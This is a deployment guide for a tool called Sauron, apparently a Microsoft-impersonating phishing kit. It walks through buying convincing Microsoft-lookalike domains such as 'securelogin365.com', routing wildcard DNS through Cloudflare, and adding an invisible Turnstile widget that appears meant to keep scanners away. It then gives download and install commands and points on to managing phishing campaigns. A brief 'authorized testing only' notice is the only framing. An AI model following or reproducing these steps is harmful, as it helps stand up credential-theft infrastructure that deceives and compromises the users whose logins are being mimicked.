Complete Setup Guide

⚠️ Legal Notice: This tool is for authorized security testing only. Ensure you have proper authorization before deployment.

Prerequisites

Server Requirements

  • Ubuntu 20.04+ (64-bit)
  • 2GB+ RAM
  • Root/sudo access
  • Public IP address

External Services

  • Domain name (any registrar)
  • Cloudflare account (free)
  • Telegram bot (optional)

Step 1: Domain Setup

1.1 Purchase Domain

Buy a convincing Microsoft-related domain from any registrar:

Good examples:

  • securelogin365.com
  • authservice.com
  • cloudplatform.com
  • secureidentity.com

1.2 Add to Cloudflare

  1. Sign up for free Cloudflare account at cloudflare.com
  2. Click "Add a Site" and enter your domain
  3. Choose the free plan
  4. Cloudflare will scan your existing DNS records
  5. Update nameservers at your registrar to Cloudflare's nameservers

1.3 Configure DNS

Add these DNS records in Cloudflare:

Type    Name    Content         Proxy
A       *       YOUR_SERVER_IP  ✅ Proxied
A       @       YOUR_SERVER_IP  ✅ Proxied

Replace YOUR_SERVER_IP with your VPS public IP address.

Step 2: Cloudflare API Setup

2.1 Create API Token

  1. Go to Cloudflare API Tokens
  2. Click "Create Token"
  3. Use "Custom token" template
  4. Configure permissions:

Token Configuration:

  • Token name: Sauron SSL
  • Permissions: Zone:Zone:Read, Zone:DNS:Edit
  • Zone Resources: Include → Specific zone → yourdomain.com

2.2 Setup Turnstile

  1. Go to Cloudflare dashboard → Your domain → Security → Turnstile
  2. Click "Add Site"
  3. Configure:
  • Site name: Sauron Bot Protection
  • Domain: yourdomain.com
  • Widget type: Invisible

Important: Copy the Secret Key, not the Site Key!

Step 3: Installation

3.1 Download and Install

# Download latest release
wget https://github.com/Skillz147/Sauron-Pro/releases/latest/download/sauron-linux-amd64.tar.gz

# Extract
tar -xzf sauron-linux-amd64.tar.gz
cd sauron

# Make scripts executable
chmod +x configure-env.sh install-production.sh

# Run interactive setup
./configure-env.sh setup

The interactive setup will prompt you for your domain, Cloudflare API token, Turnstile secret, and admin key. Keep your admin key secure - it's used for system authentication and encryption key derivation.

Step 4: Configuration

4.1 Environment Setup

The setup script will ask for these values:

ADMIN_KEY

Master authentication key for admin panel and system encryption (generate a strong 64+ character key)

SAURON_DOMAIN

Your purchased domain (e.g., securelogin365.com)

CLOUDFLARE_API_TOKEN

The API token you created (starts with alphanumeric characters)

TURNSTILE_SECRET

The Turnstile secret key (starts with 0x)

4.2 Admin Key Security

The admin key is a critical security component that:

🔐 Security Functions

  • Admin panel authentication
  • Firestore encryption key derivation
  • System configuration protection
  • Secure session management

💡 Best Practices

  • Use 64+ character random string
  • Include symbols and mixed case
  • Store securely (password manager)
  • Never share or expose publicly

⚠️ Critical: Your admin key is automatically cleared from environment variables after startup for security. Make sure to store it safely as it cannot be recovered from the system.

Step 5: Deployment

5.1 Install and Start

# Install as system service
sudo ./install-production.sh

# Check status
sudo systemctl status sauron

# View logs
sudo journalctl -u sauron -f

5.2 Verify Installation

Check that everything is working:

  • Service is running: sudo systemctl status sauron
  • SSL certificate obtained: Check logs for "Certificate obtained"
  • Domain resolves: nslookup yourdomain.com
  • HTTPS works: Visit https://yourdomain.com

Next Steps

Campaign Management

Learn how to create and manage phishing campaigns

Troubleshooting

Common issues and how to resolve them